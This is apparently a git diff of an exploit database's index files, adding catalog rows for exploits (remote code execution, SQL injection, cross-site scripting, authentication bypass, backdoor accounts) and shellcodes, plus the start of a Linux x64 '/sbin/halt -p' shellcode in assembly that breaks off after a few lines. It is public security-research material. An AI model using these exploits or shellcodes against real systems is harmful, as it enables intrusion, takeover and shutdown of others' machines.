@@ -11326,6 +11346,7 @@ id,file,description,date,author,type,platform,port 50011,exploits/linux/local/50011.sh,"Polkit 0.105-26 0.117-2 - Local Privilege Escalation",1970-01-01,"J Smith",local,linux, 50012,exploits/windows/local/50012.txt,"DiskPulse 13.6.14 - 'Multiple' Unquoted Service Path",1970-01-01,"Brian Rodriguez",local,windows, 50013,exploits/windows/local/50013.txt,"Disk Sorter Server 13.6.12 - 'Disk Sorter Server' Unquoted Service Path",1970-01-01,BRushiran,local,windows, +50014,exploits/windows/local/50014.txt,"Disk Sorter Enterprise 13.6.12 - 'Disk Sorter Enterprise' Unquoted Service Path",1970-01-01,BRushiran,local,windows, 50023,exploits/windows/local/50023.txt,"Sync Breeze 13.6.18 - 'Multiple' Unquoted Service Path",1970-01-01,"Brian Rodriguez",local,windows, 50024,exploits/windows/local/50024.txt,"Disk Savvy 13.6.14 - 'Multiple' Unquoted Service Path",1970-01-01,"Brian Rodriguez",local,windows, 50025,exploits/windows/local/50025.txt,"Dup Scout 13.5.28 - 'Multiple' Unquoted Service Path",1970-01-01,"Brian Rodriguez",local,windows, 
@@ -11348,6 +11369,7 @@ id,file,description,date,author,type,platform,port 50289,exploits/python/local/50289.py,"Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai",1970-01-01,"Abhiram V",local,python, 50331,exploits/windows/local/50331.txt,"Microsoft Windows cmd.exe - Stack Buffer Overflow",1970-01-01,hyp3rlinx,local,windows, 50332,exploits/windows/local/50332.py,"Ether_MP3_CD_Burner 1.3.8 - Buffer Overflow (SEH)",1970-01-01,stresser,local,windows, +50336,exploits/windows/local/50336.py,"Cyberfox Web Browser 52.9.1 - Denial of Service (PoC)",1970-01-01,"Aryan Chehreghani",local,windows, 50337,exploits/windows/local/50337.ps1,"XAMPP 7.4.3 - Local Privilege Escalation",1970-01-01,"Salman Asad",local,windows, 50385,exploits/linux/local/50385.txt,"Google SLO-Generator 2.0.0 - Code Execution",1970-01-01,"Kiran Ghimire",local,linux, 50416,exploits/windows/local/50416.txt,"SolarWinds Kiwi CatTools 3.11.8 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows, 
@@ -18475,6 +18497,8 @@ id,file,description,date,author,type,platform,port 49613,exploits/linux/remote/49613.py,"AnyDesk 5.5.2 - Remote Code Execution",1970-01-01,scryh,remote,linux, 49621,exploits/java/remote/49621.java,"CatDV 9.2 - RMI Authentication Bypass",1970-01-01,"Christopher Ellis",remote,java, 49629,exploits/windows/remote/49629.py,"Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2)",1970-01-01,1F98D,remote,windows, +49682,exploits/hardware/remote/49682.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access",1970-01-01,LiquidWorm,remote,hardware, +49719,exploits/multiple/remote/49719.py,"vsftpd 3.0.3 - Remote Denial of Service",1970-01-01,xynmaps,remote,multiple, 49745,exploits/multiple/remote/49745.js,"Google Chrome 86.0.4240 V8 - Remote Code Execution",1970-01-01,r4j0x00,remote,multiple, 49746,exploits/multiple/remote/49746.js,"Google Chrome 81.0.4044 V8 - Remote Code Execution",1970-01-01,r4j0x00,remote,multiple, 49754,exploits/linux/remote/49754.c,"Linux Kernel 5.4 - 'BleedingTooth' Bluetooth Zero-Click Remote Code Execution",1970-01-01,"Google Security Research",remote,linux, 
@@ -18483,6 +18507,7 @@ id,file,description,date,author,type,platform,port 49896,exploits/solaris/remote/49896.py,"Solaris SunSSH 11.0 x86 - libpam Remote Root (2)",1970-01-01,legend,remote,solaris, 49908,exploits/linux/remote/49908.py,"ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)",1970-01-01,Shellbr3ak,remote,linux, 49936,exploits/hardware/remote/49936.py,"CHIYU IoT Devices - 'Telnet' Authentication Bypass",1970-01-01,sirpedrotavares,remote,hardware, +50034,exploits/hardware/remote/50034.txt,"Dlink DSL2750U - 'Reboot' Command Injection",1970-01-01,"Mohammed Hadi",remote,hardware, 50039,exploits/solaris/remote/50039.py,"Solaris SunSSH 11.0 x86 - libpam Remote Root (3)",1970-01-01,"Nathaniel Singer",remote,solaris, 50070,exploits/android/remote/50070.py,"ES File Explorer 4.1.9.7.4 - Arbitrary File Read",1970-01-01,"Nehal Zaman",remote,android, 50133,exploits/hardware/remote/50133.py,"Aruba Instant 8.7.1.0 - Arbitrary File Modification",1970-01-01,Gr33nh4t,remote,hardware, 
@@ -26033,8 +26058,10 @@ id,file,description,date,author,type,platform,port 49443,exploits/multiple/webapps/49443.py,"ChurchRota 2.6.4 - RCE (Authenticated)",1970-01-01,"Rob McCarthy",webapps,multiple, 49444,exploits/multiple/webapps/49444.txt,"Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS",1970-01-01,omurugur,webapps,multiple, 49445,exploits/php/webapps/49445.py,"Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)",1970-01-01,"Richard Jones",webapps,php, +50461,exploits/php/webapps/50461.html,"PHPGurukul Hostel Management System 2.1 - Cross-site request forgery (CSRF) to Cross-site Scripting (XSS)",1970-01-01,"Anubhav Singh",webapps,php, 49447,exploits/php/webapps/49447.txt,"Online Documents Sharing Platform 1.0 - 'user' SQL Injection",1970-01-01,"CANKAT ÇAKMAK",webapps,php, 49433,exploits/php/webapps/49433.txt,"Alumni Management System 1.0 - _Last Name field in Registration page_ Stored XSS",1970-01-01,"Siva Rajendran",webapps,php, +49435,exploits/multiple/webapps/49435.rb,"Netsia SEBA+ 0.16.1 - Add Root User (Metasploit)",1970-01-01,AkkuS,webapps,multiple, 40091,exploits/php/webapps/40091.rb,"Tiki Wiki 15.1 - File Upload (Metasploit)",1970-01-01,"Mehmet Ince",webapps,php,80 30170,exploits/php/webapps/30170.txt,"Beehive Forum 0.7.1 - 'links.php' Multiple Cross-Site Scripting Vulnerabilities",1970-01-01,"Ory Segal",webapps,php, 18593,exploits/php/webapps/18593.txt,"ModX 2.2.0 - Multiple Vulnerabilities",1970-01-01,n0tch,webapps,php, 
@@ -43734,7 +43761,9 @@ id,file,description,date,author,type,platform,port 49345,exploits/php/webapps/49345.txt,"CMS Made Simple 2.2.15 - RCE (Authenticated)",1970-01-01,"Andrey Stoykov",webapps,php, 49346,exploits/php/webapps/49346.txt,"Subrion CMS 4.2.1 - 'avatar[path]' XSS",1970-01-01,icekam,webapps,php, 49347,exploits/multiple/webapps/49347.txt,"Click2Magic 1.1.5 - Stored Cross-Site Scripting",1970-01-01,"Shivam Verma",webapps,multiple, +49348,exploits/windows/webapps/49348.py,"Arteco Web Client DVR/NVR - 'SessionId' Brute Force",1970-01-01,LiquidWorm,webapps,windows, 49351,exploits/multiple/webapps/49351.html,"IncomCMS 2.0 - Insecure File Upload",1970-01-01,MoeAlBarbari,webapps,multiple, +49353,exploits/php/webapps/49353.txt,"Resumes Management and Job Application Website 1.0 - Authentication Bypass",1970-01-01,"Kshitiz Raj",webapps,php, 49354,exploits/php/webapps/49354.txt,"WordPress Plugin Stripe Payments 2.0.39 - 'AcceptStripePayments-settings[currency_code]' Stored XSS",1970-01-01,"Park Won Seok",webapps,php, 49355,exploits/php/webapps/49355.txt,"WordPress Plugin WP-Paginate 2.1.3 - 'preset' Stored XSS",1970-01-01,"Park Won Seok",webapps,php, 49356,exploits/php/webapps/49356.txt,"Online Movie Streaming 1.0 - Authentication Bypass",1970-01-01,"Kshitiz Raj",webapps,php, 
@@ -43926,6 +43955,11 @@ id,file,description,date,author,type,platform,port 49674,exploits/multiple/webapps/49674.txt,"VestaCP 0.9.8 - 'v_sftp_licence' Command Injection",1970-01-01,"numan türle",webapps,multiple, 49676,exploits/hardware/webapps/49676.txt,"SOYAL Biometric Access Control System 5.0 - Master Code Disclosure",1970-01-01,LiquidWorm,webapps,hardware, 49677,exploits/hardware/webapps/49677.html,"SOYAL Biometric Access Control System 5.0 - 'Change Admin Password' CSRF",1970-01-01,LiquidWorm,webapps,hardware, +49680,exploits/hardware/webapps/49680.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated)",1970-01-01,LiquidWorm,webapps,hardware, +49681,exploits/hardware/webapps/49681.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass",1970-01-01,LiquidWorm,webapps,hardware, +49683,exploits/hardware/webapps/49683.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution",1970-01-01,LiquidWorm,webapps,hardware, +49684,exploits/hardware/webapps/49684.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware, +49686,exploits/hardware/webapps/49686.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware, 49687,exploits/php/webapps/49687.txt,"Online News Portal 1.0 - 'name' SQL Injection",1970-01-01,"Richard Jones",webapps,php, 49688,exploits/php/webapps/49688.txt,"Online News Portal 1.0 - 'Multiple' Stored Cross-Site Scripting",1970-01-01,"Richard Jones",webapps,php, 49693,exploits/php/webapps/49693.php,"WordPress Plugin Delightful Downloads Jquery File Tree 1.6.6 - Path Traversal",1970-01-01,"Nicholas Ferreira",webapps,php, 
@@ -43935,7 +43969,10 @@ id,file,description,date,author,type,platform,port 49705,exploits/multiple/webapps/49705.py,"Codiad 2.8.4 - Remote Code Execution (Authenticated)",1970-01-01,WangYihang,webapps,multiple, 49708,exploits/hardware/webapps/49708.txt,"Linksys EA7500 2.0.8.194281 - Cross-Site Scripting",1970-01-01,MiningOmerta,webapps,hardware, 49709,exploits/hardware/webapps/49709.txt,"Genexis Platinum-4410 P4410-V2-1.31A - 'start_addr' Persistent Cross-Site Scripting",1970-01-01,"Jithin KS",webapps,hardware, +49712,exploits/php/webapps/49712.html,"'customhs_js_content' - 'customhs_js_content' Cross-Site Request Forgery",1970-01-01,"Abhishek Joshi",webapps,php, +49713,exploits/php/webapps/49713.txt,"Regis Inventory And Monitoring System 1.0 - 'Item List' Persistent Cross-Site Scripting",1970-01-01,"George Tsimpidas",webapps,php, 49714,exploits/php/webapps/49714.txt,"Moodle 3.10.3 - 'label' Persistent Cross Site Scripting",1970-01-01,Vincent666,webapps,php, +49665,exploits/php/webapps/49665.txt,"rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (1)",1970-01-01,"Murat ŞEKER",webapps,php, 49718,exploits/php/webapps/49718.txt,"WordPress Plugin WP Super Cache 1.7.1 - Remote Code Execution (Authenticated)",1970-01-01,m0ze,webapps,php, 49720,exploits/hardware/webapps/49720.txt,"TP-Link Devices - 'setDefaultHostname' Stored Cross-site Scripting (Unauthenticated)",1970-01-01,"Smriti Gaba",webapps,hardware, 49721,exploits/php/webapps/49721.txt,"Concrete5 8.5.4 - 'name' Stored XSS",1970-01-01,"Quadron Research Lab",webapps,php, 
@@ -43957,6 +43994,7 @@ id,file,description,date,author,type,platform,port 49742,exploits/php/webapps/49742.py,"OpenEMR 4.1.0 - 'u' SQL Injection",1970-01-01,"Michael Ikua",webapps,php, 49743,exploits/windows/webapps/49743.py,"Mini Mouse 9.2.0 - Remote Code Execution",1970-01-01,gosh,webapps,windows, 49744,exploits/windows/webapps/49744.txt,"Mini Mouse 9.2.0 - Path Traversal",1970-01-01,gosh,webapps,windows, +49747,exploits/ios/webapps/49747.txt,"Mini Mouse 9.3.0 - Local File inclusion",1970-01-01,gosh,webapps,ios, 49748,exploits/multiple/webapps/49748.txt,"Atlassian Jira Service Desk 4.9.1 - Unrestricted File Upload to XSS",1970-01-01,Captain_hook,webapps,multiple, 49749,exploits/php/webapps/49749.txt,"Composr CMS 10.0.36 - Cross Site Scripting",1970-01-01,"Orion Hridoy",webapps,php, 49750,exploits/windows/webapps/49750.py,"Dell OpenManage Server Administrator 9.4.0.0 - Arbitrary File Read",1970-01-01,"Rhino Security Labs",webapps,windows, 
@@ -43983,6 +44021,7 @@ id,file,description,date,author,type,platform,port 49779,exploits/php/webapps/49779.txt,"BlackCat CMS 1.3.6 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Ömer Hasan Durmuş",webapps,php, 49781,exploits/php/webapps/49781.py,"RemoteClinic 2 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,nu11secur1ty,webapps,php, 49795,exploits/php/webapps/49795.txt,"RemoteClinic 2.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Saud Ahmad",webapps,php, +49783,exploits/php/webapps/49783.py,"rconfig 3.9.6 - Arbitrary File Upload",1970-01-01,"Vishwaraj Bhattrai",webapps,php, 49784,exploits/php/webapps/49784.py,"OpenEMR 5.0.2.1 - Remote Code Execution",1970-01-01,Hato0,webapps,php, 49785,exploits/hardware/webapps/49785.txt,"Adtran Personal Phone Manager 10.8.1 - 'emailAddress' Stored Cross-Site Scripting (XSS)",1970-01-01,3ndG4me,webapps,hardware, 49786,exploits/hardware/webapps/49786.txt,"Adtran Personal Phone Manager 10.8.1 - 'Multiple' Reflected Cross-Site Scripting (XSS)",1970-01-01,3ndG4me,webapps,hardware, 
@@ -43993,6 +44032,7 @@ id,file,description,date,author,type,platform,port 49794,exploits/perl/webapps/49794.py,"OTRS 6.0.1 - Remote Command Execution (2)",1970-01-01,Hex_26,webapps,perl, 49797,exploits/php/webapps/49797.txt,"Moodle 3.10.3 - 'url' Persistent Cross Site Scripting",1970-01-01,UVision,webapps,php, 49799,exploits/multiple/webapps/49799.py,"DzzOffice 2.02.1 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,nu11secur1ty,webapps,multiple, +49800,exploits/hardware/webapps/49800.html,"Sipwise C5 NGCP CSC - 'Multiple' Persistent Cross-Site Scripting (XSS)",1970-01-01,LiquidWorm,webapps,hardware, 49801,exploits/hardware/webapps/49801.html,"Sipwise C5 NGCP CSC - Click2Dial Cross-Site Request Forgery (CSRF)",1970-01-01,LiquidWorm,webapps,hardware, 49803,exploits/python/webapps/49803.py,"OpenPLC 3 - Remote Code Execution (Authenticated)",1970-01-01,"Fellipe Oliveira",webapps,python, 49804,exploits/php/webapps/49804.py,"SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (2)",1970-01-01,nu11secur1ty,webapps,php, 
@@ -44078,6 +44118,7 @@ id,file,description,date,author,type,platform,port 49951,exploits/ruby/webapps/49951.py,"Gitlab 13.10.2 - Remote Code Execution (Authenticated)",1970-01-01,enox,webapps,ruby, 49955,exploits/hardware/webapps/49955.py,"OptiLink ONT1GEW GPON 2.1.11_X101 Build 1127.190306 - Remote Code Execution (Authenticated)",1970-01-01,SecNigma,webapps,hardware, 49958,exploits/php/webapps/49958.txt,"WordPress Plugin Smart Slider-3 3.5.0.8 - 'name' Stored Cross-Site Scripting (XSS)",1970-01-01,"Hardik Solanki",webapps,php, +49960,exploits/linux/webapps/49960.py,"Rocket.Chat 3.12.1 - NoSQL Injection (Unauthenticated)",1970-01-01,enox,webapps,linux, 49961,exploits/php/webapps/49961.py,"Grav CMS 1.7.10 - Server-Side Template Injection (SSTI) (Authenticated)",1970-01-01,enox,webapps,php, 49962,exploits/php/webapps/49962.sh,"Wordpress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unauthenticated)",1970-01-01,UnD3sc0n0c1d0,webapps,php, 49967,exploits/php/webapps/49967.py,"WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticated)",1970-01-01,"Fellipe Oliveira",webapps,php, 
@@ -44107,6 +44148,7 @@ id,file,description,date,author,type,platform,port 50007,exploits/php/webapps/50007.txt,"Client Management System 1.1 - 'username' Stored Cross-Site Scripting (XSS)",1970-01-01,"BHAVESH KAUL",webapps,php, 50008,exploits/tru64/webapps/50008.txt,"Client Management System 1.1 - 'Search' SQL Injection",1970-01-01,"BHAVESH KAUL",webapps,tru64, 50016,exploits/php/webapps/50016.txt,"Cotonti Siena 0.9.19 - 'maintitle' Stored Cross-Site Scripting",1970-01-01,"Fatih İLGİN",webapps,php, +50017,exploits/php/webapps/50017.py,"OpenEMR 5.0.1.3 - Authentication Bypass",1970-01-01,"Ron Jost",webapps,php, 50018,exploits/php/webapps/50018.txt,"Teachers Record Management System 1.0 - 'Multiple' SQL Injection (Authenticated)",1970-01-01,nhattruong,webapps,php, 50019,exploits/php/webapps/50019.txt,"Teachers Record Management System 1.0 - 'email' Stored Cross-site Scripting (XSS)",1970-01-01,nhattruong,webapps,php, 50021,exploits/php/webapps/50021.txt,"CKEditor 3 - Server-Side Request Forgery (SSRF)",1970-01-01,ahmed,webapps,php, 
@@ -44130,6 +44172,8 @@ id,file,description,date,author,type,platform,port 50053,exploits/php/webapps/50053.txt,"Online Library Management System 1.0 - 'Search' SQL Injection",1970-01-01,"Berk Can Geyikci",webapps,php, 50054,exploits/php/webapps/50054.py,"Online Library Management System 1.0 - Arbitrary File Upload Remote Code Execution (Unauthenticated)",1970-01-01,"Berk Can Geyikci",webapps,php, 50055,exploits/php/webapps/50055.txt,"Simple CRM 3.0 - 'email' SQL injection (Authentication Bypass)",1970-01-01,"Rinku Kumar",webapps,php, +50056,exploits/multiple/webapps/50056.py,"VMware vCenter Server 7.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,CHackA0101,webapps,multiple, +50460,exploits/php/webapps/50460.txt,"WordPress Plugin Supsystic Contact Form 1.7.18 - 'label' Stored Cross-Site Scripting (XSS)",1970-01-01,"Murat DEMİRCİ",webapps,php, 50057,exploits/cfm/webapps/50057.py,"Adobe ColdFusion 8 - Remote Command Execution (RCE)",1970-01-01,Pergyz,webapps,cfm, 50058,exploits/hardware/webapps/50058.py,"TP-Link TL-WR841N - Command Injection",1970-01-01,"Koh You Liang",webapps,hardware, 50108,exploits/linux/webapps/50108.py,"Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated) (2)",1970-01-01,enox,webapps,linux, 
@@ -44274,6 +44318,7 @@ id,file,description,date,author,type,platform,port 50263,exploits/php/webapps/50263.txt,"Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)",1970-01-01,sudoninja,webapps,php, 50264,exploits/php/webapps/50264.py,"Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload",1970-01-01,a-rey,webapps,php, 50441,exploits/hardware/webapps/50441.py,"Hikvision Web Server Build 210702 - Command Injection",1970-01-01,bashis,webapps,hardware, +50265,exploits/php/webapps/50265.py,"Patient Appointment Scheduler System 1.0 - Persistent Cross-Site Scripting",1970-01-01,a-rey,webapps,php, 50267,exploits/multiple/webapps/50267.txt,"Antminer Monitor 0.5.0 - Authentication Bypass",1970-01-01,Vulnz,webapps,multiple, 50268,exploits/php/webapps/50268.txt,"WordPress Plugin WP Sitemap Page 1.6.4 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Nikhil Kapoor",webapps,php, 50269,exploits/php/webapps/50269.py,"WordPress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection (2)",1970-01-01,"Mohin Paramasivam",webapps,php, 
@@ -44290,6 +44335,7 @@ id,file,description,date,author,type,platform,port 50285,exploits/hardware/webapps/50285.txt,"ECOA Building Automation System - Local File Disclosure",1970-01-01,Neurogenesia,webapps,hardware, 50286,exploits/hardware/webapps/50286.txt,"ECOA Building Automation System - Arbitrary File Deletion",1970-01-01,Neurogenesia,webapps,hardware, 50287,exploits/php/webapps/50287.py,"Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload",1970-01-01,spacehen,webapps,php, +50288,exploits/php/webapps/50288.py,"Apartment Visitor Management System (AVMS) 1.0 - 'username' SQL Injection",1970-01-01,mari0x00,webapps,php, 50292,exploits/php/webapps/50292.py,"Purchase Order Management System 1.0 - Remote File Upload",1970-01-01,"Aryan Chehreghani",webapps,php, 50298,exploits/php/webapps/50298.py,"ImpressCMS 1.4.2 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php, 50294,exploits/php/webapps/50294.txt,"Support Board 3.3.3 - 'Multiple' SQL Injection (Unauthenticated)",1970-01-01,"John Jefferson Li",webapps,php, 
@@ -44304,6 +44350,8 @@ id,file,description,date,author,type,platform,port 50304,exploits/php/webapps/50304.sh,"WordPress 5.7 - 'Media Library' XML External Entity Injection (XXE) (Authenticated)",1970-01-01,"David Utón",webapps,php, 50305,exploits/php/webapps/50305.py,"Online Food Ordering System 2.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Abdullah Khawaja",webapps,php, 50306,exploits/php/webapps/50306.py,"Church Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Abdullah Khawaja",webapps,php, +50307,exploits/php/webapps/50307.txt,"Budget and Expense Tracker System 1.0 - Authenticated Bypass",1970-01-01,"Prunier Charles-Yves",webapps,php, +50308,exploits/php/webapps/50308.txt,"Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Abdullah Khawaja",webapps,php, 50310,exploits/php/webapps/50310.py,"WebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php, 50315,exploits/php/webapps/50315.py,"e107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php, 50316,exploits/php/webapps/50316.py,"OpenCats 0.9.4-2 - 'docx ' XML External Entity Injection (XXE)",1970-01-01,"Jake Ruston",webapps,php, 
@@ -44321,6 +44369,7 @@ id,file,description,date,author,type,platform,port 50329,exploits/php/webapps/50329.txt,"Pharmacy Point of Sale System 1.0 - SQLi Authentication BYpass",1970-01-01,"Janik Wehrli",webapps,php, 50333,exploits/php/webapps/50333.txt,"WordPress Plugin Wappointment 2.2.4 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Renos Nikolaou",webapps,php, 50334,exploits/php/webapps/50334.txt,"Library System 1.0 - 'student_id' SQL injection (Authenticated)",1970-01-01,"Vinay Bhuria",webapps,php, +50338,exploits/hardware/webapps/50338.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF)",1970-01-01,LiquidWorm,webapps,hardware, 50339,exploits/hardware/webapps/50339.txt,"FatPipe Networks WARP 10.2.2 - Authorization Bypass",1970-01-01,LiquidWorm,webapps,hardware, 50340,exploits/hardware/webapps/50340.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Config Download (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware, 50341,exploits/hardware/webapps/50341.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access)",1970-01-01,LiquidWorm,webapps,hardware, 
@@ -44330,6 +44379,7 @@ id,file,description,date,author,type,platform,port 50345,exploits/php/webapps/50345.txt,"WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php, 50346,exploits/php/webapps/50346.txt,"WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php, 50348,exploits/php/webapps/50348.py,"Storage Unit Rental Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Ghuliev,webapps,php, +50349,exploits/php/webapps/50349.txt,"WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php, 50350,exploits/php/webapps/50350.txt,"WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting",1970-01-01,0xB9,webapps,php, 50352,exploits/php/webapps/50352.txt,"OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS)",1970-01-01,"Eric Salario",webapps,php, 50353,exploits/php/webapps/50353.php,"Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Mr.Gedik,webapps,php, 
@@ -44337,12 +44387,14 @@ id,file,description,date,author,type,platform,port 50356,exploits/php/webapps/50356.py,"Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,pussycat0x,webapps,php, 50357,exploits/php/webapps/50357.txt,"Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi)",1970-01-01,Murat,webapps,php, 50360,exploits/php/webapps/50360.txt,"Exam Form Submission System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Nitin Sharma",webapps,php, +50362,exploits/php/webapps/50362.txt,"Blood Bank System 1.0 - Authentication Bypass",1970-01-01,"Nitin Sharma",webapps,php, 50364,exploits/php/webapps/50364.py,"Vehicle Service Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Ghuliev,webapps,php, 50365,exploits/php/webapps/50365.txt,"Dairy Farm Shop Management System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php, 50366,exploits/multiple/webapps/50366.txt,"WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Andreas Finstad",webapps,multiple, 50367,exploits/php/webapps/50367.py,"CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php, 50370,exploits/php/webapps/50370.txt,"Directory Management System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php, 50371,exploits/multiple/webapps/50371.txt,"Payara Micro Community 5.2021.6 - Directory Traversal",1970-01-01,"Yasser Khan",webapps,multiple, +50372,exploits/php/webapps/50372.txt,"Lodging Reservation Management System 1.0 - Authentication Bypass",1970-01-01,"Nitin Sharma",webapps,php, 50373,exploits/multiple/webapps/50373.py,"Open Game Panel - Remote Code Execution (RCE) (Authenticated)",1970-01-01,prey,webapps,multiple, 50374,exploits/php/webapps/50374.txt,"Young Entrepreneur E-Negosyo System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Jordan Glover",webapps,php, 50375,exploits/php/webapps/50375.txt,"Young 
Entrepreneur E-Negosyo System 1.0 - 'PRODESC' Stored Cross-Site Scripting (XSS)",1970-01-01,"Jordan Glover",webapps,php, @@ -44350,6 +44402,7 @@ id,file,description,date,author,type,platform,port 50377,exploits/java/webapps/50377.txt,"Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary File Read",1970-01-01,"Mayank Deshmukh",webapps,java, 50378,exploits/php/webapps/50378.py,"Wordpress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated)",1970-01-01,spacehen,webapps,php, 50379,exploits/php/webapps/50379.py,"Wordpress Plugin MStore API 2.0.6 - Arbitrary File Upload",1970-01-01,spacehen,webapps,php, +50380,exploits/multiple/webapps/50380.txt,"Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read",1970-01-01,"Mayank Deshmukh",webapps,multiple, 50381,exploits/multiple/webapps/50381.txt,"Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection",1970-01-01,"Emel Basayar",webapps,multiple, 50382,exploits/php/webapps/50382.py,"Wordpress Plugin BulletProof Security 5.1 - Sensitive Information Disclosure",1970-01-01,"Ron Jost",webapps,php, 50383,exploits/multiple/webapps/50383.sh,"Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)",1970-01-01,"Lucas Souza",webapps,multiple, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 183fffa14..90793a5b6 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv 
@@ -1025,4 +1025,9 @@ id,file,description,date,author,type,platform
 48592,shellcodes/linux_x86/48592.c,"Linux/x86 - Disable ASLR Security + Polymorphic Shellcode (124 bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,linux_x86
 48703,shellcodes/linux_x86/48703.c,"Linux/x86 - Egghunter (0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)",1970-01-01,danf42,shellcode,linux_x86
 48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download File (http://192.168.43.192:8080/9MKWaRO.hta) Via mshta Shellcode (100 bytes)",1970-01-01,"Siddharth Sharma",shellcode,windows_x86
+49756,shellcodes/linux/49756.asm,"Linux/x64 - /sbin/halt -p Shellcode (51 bytes)",1970-01-01,"Chenthur Velan",shellcode,linux
+49768,shellcodes/linux_x86/49768.c,"Linux/x86 - execve(/bin/sh) Shellcode (17 bytes)",1970-01-01,s1ege,shellcode,linux_x86
+49770,shellcodes/linux_x86-64/49770.c,"Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2)",1970-01-01,s1ege,shellcode,linux_x86-64
+49976,shellcodes/linux_x86/49976.c,"Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded)",1970-01-01,d7x,shellcode,linux_x86
 50291,shellcodes/windows_x86-64/50291.c,"Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,windows_x86-64
+50384,shellcodes/windows_x86/50384.c,"Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)",1970-01-01,"Daniel Ortiz",shellcode,windows_x86
diff --git a/shellcodes/linux/49756.asm b/shellcodes/linux/49756.asm
new file mode 100644
index 000000000..7d17307b5
--- /dev/null
+++ b/shellcodes/linux/49756.asm
@@ -0,0 +1,28 @@
+# Exploit Title: Linux/x64 - /sbin/halt -p Shellcode (51 bytes)
+# Date: 07/04/2020
+# Exploit Author: Chenthur Velan
+# Version: 0.0.1
+# Tested on: Linux Intelx86-64
+
+global _start
+
+_start:
+ xor rax, rax
+ push rax
+ push word 0x702d
+ mov rcx, rsp
+
+ push rax
